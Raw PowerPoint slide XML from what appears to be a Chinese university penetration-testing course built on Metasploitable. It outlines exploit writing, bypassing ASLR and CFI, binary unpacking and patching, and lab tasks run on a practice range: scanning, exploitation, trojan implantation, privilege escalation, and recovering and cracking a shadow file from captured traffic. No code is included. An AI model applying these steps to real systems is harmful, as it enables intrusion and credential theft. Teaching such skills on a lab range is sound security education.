            <a:off x="698863" y="5367933"/>
            <a:ext cx="4408751" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：获得流量中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、可执行  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="21467D"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进阶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：插入木马，攻击嗅探</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="41" name="直接连接符 40"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4640124" y="2995162"/>
            <a:ext cx="1" cy="470954"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="diamond" w="med" len="med"/>
            <a:tailEnd type="diamond" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="文本框 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1918539" y="2178824"/>
            <a:ext cx="4777891" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>识别、脱掉二进制程序中加壳及其变种</a:t>
            </a:r>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进阶：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>脱掉自定义的虚拟机壳</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手工脱壳</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">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7176787" y="4883986"/>
            <a:ext cx="1" cy="470954"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="21467D"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="diamond" w="med" len="med"/>
            <a:tailEnd type="diamond" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="文本框 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395955" y="5463994"/>
            <a:ext cx="4524940" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本</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能够发现各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>off by one</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、堆漏洞、</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UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>漏洞，并编写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>进阶</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="21467D"/>
                </a:solidFill>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绕过系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ALSR</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CFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>等各种防御机制</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="21467D"/>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9713242" y="3037630"/>
            <a:ext cx="1" cy="470954"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="diamond" w="med" len="med"/>
            <a:tailEnd type="diamond" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="文本框 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7173804" y="2049599"/>
            <a:ext cx="4213063" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本</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对二进制程序进行冷补丁，修正</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a: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程序错误</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">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进阶</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对二进制程序进行热补丁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="右箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3045076" y="4010820"/>
            <a:ext cx="617208" cy="19605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0" name="右箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5464326" y="4048522"/>
            <a:ext cx="617208" cy="19605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右箭头 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8155922" y="4050978"/>
            <a:ext cx="617208" cy="19605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45" name="图片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76262" y="-6826"/>
            <a:ext cx="2618385" cy="664900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2703076" y="3592748"/>
            <a:ext cx="1408373" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>可执行程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5095070" y="3619558"/>
            <a:ext cx="1581882" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>还原后的程序</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="文本框 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7622617" y="3627119"/>
            <a:ext cx="1581882" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>程序发现漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="文本框 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10115002" y="3596921"/>
            <a:ext cx="1581882" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>漏洞被补上</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="115297">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84F42-044F-4261-AE0D-F53E7B0EFF0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验任务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18EAD3CD-75AA-438A-8EB4-255C66FE6241}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在黄鹤靶场上完成课程的实验（漏洞利用部分可以选择</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>1-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>种漏洞来实现）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>需要完成从扫描到发现漏洞，再到利用漏洞，植入木马，提权等过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>提交实验过程文档</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416170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下一节课任务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二次实验，利用别组的抓包文件，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>流量分析</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>找出攻击主机，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击还原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，并</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>从流量中还原</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件，破解密码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>系统中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Applications---&gt;09-Sniffering &amp; Spoofing---&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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sz="4400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 渗透测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264840" y="4031570"/>
            <a:ext cx="9799200" cy="1472400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指导老师：王美珍</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="838583349"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="2000" advTm="10471"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow" advTm="10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实验内容</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验目的</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>实验环境</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
